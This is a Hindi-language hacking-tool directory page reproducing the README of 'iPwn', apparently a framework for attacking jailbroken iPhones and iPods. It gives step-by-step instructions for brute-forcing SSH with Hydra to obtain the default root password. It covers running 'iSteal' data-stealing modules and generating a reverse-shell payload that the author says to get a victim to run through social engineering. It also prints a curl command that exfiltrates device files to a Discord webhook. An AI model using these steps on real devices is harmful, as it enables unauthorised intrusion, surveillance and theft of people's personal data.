Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/brows3r/ipwn
आईओएस सुरक्षापासवर्ड हमलेपेलोड जनरेशनशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगमोबाइल सुरक्षारिमोट एक्सेस टूल
GitHubbrows3r/ipwn

iPwn

iOS उपकरणों के शोषण के लिए बनाया गया एक फ्रेमवर्क।

रिपॉजिटरी देखें
2333685 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

iPwn

iOS उपकरणों के शोषण के लिए एक फ्रेमवर्क। image

<!> याद रखें: इस टूल का उपयोग करके जिस iPhone में प्रवेश करने का प्रयास कर रहे हैं, वह जेलब्रेक होना चाहिए। <!>

स्थिति - ❌

यह प्रोजेक्ट अभी भी काम चल रहा है। मैं डिवाइस की जानकारी और अन्य चीजों को इकट्ठा करने के लिए पोस्ट-एक्सप्लॉइटेशन के लिए और अधिक एक्सटेंशन और विकल्प जोड़ रहा हूं। मैं एक सामान्य iOS ट्वीक में पेलोड डालने का एक तरीका भी काम कर रहा हूं ताकि रिवर्स शेल प्राप्त करना आसान हो सके।

अपडेट लॉग्स

[6/2/21] - अपने कंप्यूटर से जुड़े डिवाइस वाले लोगों के लिए एक अतिरिक्त मेनू जोड़ा गया जो उनके साथ छेड़छाड़ करना चाहते हैं। जल्द ही इसमें और जोड़ा जाएगा।

[6/2/21] - 'iSteal' पोस्ट-एक्सप्लॉइटेशन टूल के लिए 4 अतिरिक्त मॉड्यूल जोड़े गए। साथ ही checkra1n जेलब्रेक इंस्टॉल करने का विकल्प भी जोड़ा गया।

[5/25/21] - 'iSteal' पोस्ट-एक्सप्लॉइटेशन टूल के लिए 8 अतिरिक्त मॉड्यूल जोड़े गए।

[5/25/21] - 'iSteal' पोस्ट-एक्सप्लॉइटेशन टूल के लिए 2 अतिरिक्त मॉड्यूल जोड़े गए।

विवरण/उपयोग कैसे करें [नौसिखियों के लिए!!!]

iPwn एक फ्रेमवर्क है जो iOS उपकरणों का शोषण करने और उन तक पहुंच प्राप्त करने के लिए है। इसमें एक एक्सटेंशन भी है जो 'iSteal' नामक एक मिनी-फ्रेमवर्क है जो पोस्ट-एक्सप्लॉइटेशन (डिवाइस तक पहुंच प्राप्त करने के बाद) के लिए है। यह विवरण आपको iOS डिवाइस तक पहुंच प्राप्त करने और उससे जानकारी प्राप्त करने के विभिन्न तरीकों और चरणों के बारे में बताएगा।

iOS डिवाइस तक पहुंच प्राप्त करने का पहला तरीका - SSH-बलपूर्वक प्रवेश (SSH-Bruteforcing)।

अधिकांश जेलब्रेक किए गए iOS डिवाइस जिनमें Cydia है, OpenSSH के साथ पहले से पैकेज होते हैं। और आमतौर पर, क्रेडेंशियल बहुत कमजोर या सामान्य होते हैं, सबसे सामान्य पासवर्डों में से एक उस वर्डलिस्ट में शामिल होगा जो यदि आपने मेरे Github से iPwn डाउनलोड किया है तो आपके फोल्डर में होना चाहिए।

तो चलिए शुरू करते हैं! सबसे पहले, हम स्क्रिप्ट चलाकर शुरू करेंगे।

root@kitploit:~
python main.py

फिर, हम 'brute' कमांड टाइप करने जा रहे हैं। (यदि आप help टाइप करना चाहते हैं और कमांड से परिचित होना चाहते हैं, तो आप ऐसा कर सकते हैं।) image

एक बार जब हम 'brute' कमांड टाइप कर लेते हैं। सभी उपलब्ध कमांड प्रदर्शित करने के लिए 'help' टाइप करें। image अब, हम सबसे सामान्य पासवर्ड वाली वर्डलिस्ट का उपयोग करके SSH-बलपूर्वक प्रवेश शुरू करने के लिए 'default' कमांड का उपयोग करेंगे। आपसे लक्ष्य का IP पता दर्ज करने के लिए कहा जाएगा, कृपया सुनिश्चित करें कि आप सही और मान्य IP दर्ज कर रहे हैं, एंटर दबाएं, फिर अगले चरण पर जाएं। image

<!> यदि आपको त्रुटियां मिल रही हैं, तो कृपया सुनिश्चित करें कि HYDRA इंस्टॉल है, आप नीचे दिए गए कमांड से HYDRA इंस्टॉल कर सकते हैं <!>

root@kitploit:~
hydra इंस्टॉल करने के लिए कमांड:

sudo apt install hydra
sudo pacman -S hydra

अब वापस ट्यूटोरियल पर, यदि आपके पीसी पर hydra इंस्टॉल है, तो यह पहले से ही बलपूर्वक प्रवेश का प्रयास कर रहा होगा। लगभग 20-40 सेकंड रुकें और यदि डिवाइस वर्डलिस्ट में दिए गए डिफ़ॉल्ट/सामान्य क्रेडेंशियल का उपयोग करता है, तो Hydra आपको एक छोटा संदेश देगा जो सही पासवर्ड दिखाएगा। image

जैसा कि हम देख सकते हैं, सही पासवर्ड 'alpine' है। अब हम दूसरे टर्मिनल विंडो पर 'ssh root@ip_goes_here' करके फोन में लॉगिन कर सकते हैं। एक बार जब यह आपसे पासवर्ड मांगे, तो बस Hydra से प्राप्त पासवर्ड दर्ज करें। image

अब हम लॉग इन हैं!

image

इस बिंदु पर हम शायद फोन पर कुछ जानकारी एकत्र करना और इसे नियंत्रित करना चाहते हैं, वह बाद में आएगा। क्योंकि पहले, हमें कुछ बहुत महत्वपूर्ण चीजें इंस्टॉल करने की आवश्यकता है। यदि आप हर चीज को स्वचालित करने वाली सेटअप फ़ाइल को स्थानांतरित करने के लिए SCP का उपयोग करना चाहते हैं, तो आप ऐसा कर सकते हैं। फ़ाइल /post-exploitation/post.sh में है। एक बार जब आप 'post.sh' फ़ाइल को iOS डिवाइस पर स्थानांतरित कर लेते हैं, तो इसे 'bash post.sh' करके निष्पादित करें और यह उन पोस्ट-एक्सप्लॉइटेशन टूल्स को इंस्टॉल और सेटअप करना शुरू कर देगा जिनका हम उपयोग करेंगे।

<!> नोट: नीचे दिए गए कमांड केवल उन लोगों के लिए हैं जो आवश्यक पैकेज और टूल्स मैन्युअल रूप से इंस्टॉल करना चाहते हैं <!>

root@kitploit:~
आवश्यक सब कुछ सेटअप/इंस्टॉल करने के लिए ये सभी कमांड चलाएं:

apt install netcat
apt install python3
apt install nano
git clone https://github.com/0x1CA3/iSteal.git

ठीक है, अब जब हमने सब कुछ इंस्टॉल कर लिया है, तो हम 'iSteal' फोल्डर में जा सकते हैं और 'iSteal' पोस्ट-एक्सप्लॉइटेशन स्क्रिप्ट चला सकते हैं।

root@kitploit:~
python3 post.py

<!> नोट: सुनिश्चित करें कि जब आप python फ़ाइलें चलाने का प्रयास करें, तो "python" या "py" के बजाय "python3" का उपयोग करें <!>

तो अब स्क्रिप्ट लोड हो गई होगी, यदि आप 'help' कमांड का उपयोग करना चाहते हैं और चारों ओर देखना चाहते हैं, तो आप ऐसा कर सकते हैं। image

अब, हम पोस्ट-एक्सप्लॉइटेशन के लिए उपलब्ध मॉड्यूल/विकल्प दिखाने के लिए 'list' कमांड का उपयोग करने जा रहे हैं। image

<!> ध्यान रखें: पोस्ट-एक्सप्लॉइटेशन स्क्रिप्ट पर बहुत सारे अपडेट होंगे, और अधिक मॉड्यूल जोड़े जाएंगे, इसलिए सटीकता के लिए इस छवि को अपडेट किया जाएगा <!>

मॉड्यूल का उपयोग करने के लिए, बस 'use specific/module' करें। उदाहरण: use modules/list_installed_default_apps

और जैसा कि आप देख सकते हैं, जब हम उस मॉड्यूल को चलाते हैं, तो यह हमें लक्ष्य के iOS डिवाइस पर इंस्टॉल किए गए डिफ़ॉल्ट एप्लिकेशन दिखाता है। image

iOS डिवाइस तक पहुंच प्राप्त करने का दूसरा तरीका - रिवर्स शेल।

अब, मैं आपको दिखाने जा रहा हूं कि दूसरे तरीके से कैसे किया जाता है, जो थोड़ा अधिक उन्नत है। ध्यान रखें, मैं इस भाग के लिए चित्र शामिल नहीं करूंगा।

root@kitploit:~
'python main.py' करके iPwn फ्रेमवर्क चलाएं
'payload' कमांड टाइप करें
पेलोड फैक्टरी लोड होने की प्रतीक्षा करें।
अपनी पसंद का एक पेलोड चुनें, उदाहरण: use payloads/factory/reverse_bash
अपना IP दर्ज करें
अपना पोर्ट दर्ज करें
फिर आपको एक संदेश मिलना चाहिए जो कहता है 'payload generated'
मुख्य मेनू पर वापस जाने के लिए 'back' कमांड टाइप करें
आने वाले कनेक्शनों को सुनना शुरू करने के लिए 'listen' कमांड टाइप करें
सुनिश्चित करें कि आपका पीड़ित टर्मिनल के माध्यम से या अपने तरीके से स्क्रिप्ट चलाता है, सोशल इंजीनियरिंग का प्रयास करें, रचनात्मक बनें!
एक बार जब पीड़ित के iOS डिवाइस पर स्क्रिप्ट निष्पादित हो जाती है, तो आपको एक कनेक्शन मिलना चाहिए
/post-exploitation में स्थित 'post.sh' को स्थानांतरित करके और इसे निष्पादित करके या स्वयं मैन्युअल रूप से करके महत्वपूर्ण पैकेज इंस्टॉल करें
अब आप 'iSteal' या 'AutoEnum' पोस्ट-एक्सप्लॉइटेशन टूल्स चला सकते हैं
मज़े करो! :)

<!> यदि आप चरण 2 कर रहे हैं और महत्वपूर्ण पैकेज/टूल्स इंस्टॉल करने वाले भाग पर अटक जाते हैं, तो चरण 1 में जाएं और पैकेज/टूल्स इंस्टॉल करने के लिए गाइड कॉपी करें! <!>

फ़ाइल स्थानांतरण/निष्कर्षण

iOS डिवाइस पर फ़ाइलें स्थानांतरित करने के कई तरीके हैं और उन्हें डाउनलोड करने के भी कई तरीके हैं। iOS डिवाइस से फ़ाइलें निकालने और डाउनलोड करने का सबसे आसान तरीका Curl और एक डिस्कॉर्ड वेबहुक का उपयोग करना है।

<!> नोट: नीचे दिया गया खंड प्रदर्शित करेगा कि curl का उपयोग करके iOS डिवाइस से फ़ाइलें कैसे निकालें और डाउनलोड करें <!>

root@kitploit:~
चरण 1: एक डिस्कॉर्ड सर्वर बनाएं
चरण 2: एक वेबहुक बनाएं और लिंक कॉपी करें
चरण 3: iOS डिवाइस पर, उस निर्देशिका पर नेविगेट करें जिसमें वह फ़ाइल है जिसे आप प्राप्त करना चाहते हैं।
चरण 4: नीचे दिया गया कमांड दर्ज करें (file_here.txt को अपनी फ़ाइल के नाम से बदलें, webhook_url_here को अपने वेबहुक URL से बदलें)

curl -i -H 'Expect: application/json' -F file=@file_here.txt -F 'payload_json={ "wait": true, "content": "", "username": "" }' webhook_url_here

चरण 5: लगभग 10-50 सेकंड प्रतीक्षा करें
हो गया! फ़ाइल अब आपके डिस्कॉर्ड सर्वर पर अपलोड हो जानी चाहिए। अब आप फ़ाइल डाउनलोड/देख सकते हैं।

परीक्षित ओएस

root@kitploit:~
Windows 10 - स्थिर
Garuda Linux - स्थिर
आर्क आधारित वितरण - स्थिर

समर्थित और परीक्षण किए गए iOS डिवाइस

root@kitploit:~
समर्थित डिवाइस [पोस्ट-एक्सप्लॉइटेशन एक्सटेंशन इन सभी के लिए काम करना चाहिए]
-----------------
चौथी पीढ़ी के iPod से नए iPods
iPhone 4
iPhone 4S
iPhone 5
iPhone 6
iPhone SE
iPhone 7
iPhone 7+
iPhone 8
iPhone 8+
iPhone X
iPhone XR
iPhone XS
iPhone 11
iPhone 12

मेरे अपने परीक्षण किए गए डिवाइस [जिनका मैंने स्वयं व्यक्तिगत रूप से परीक्षण किया है]
---------------------
iPhone 4S
iPhone 5S
iPhone SE
iPhone 7+
iPad Air
iPod चौथी पीढ़ी

स्क्रीनशॉट

image image image image

श्रेय

[https://github.com/0x1CA3]

टूल डाउनलोड करें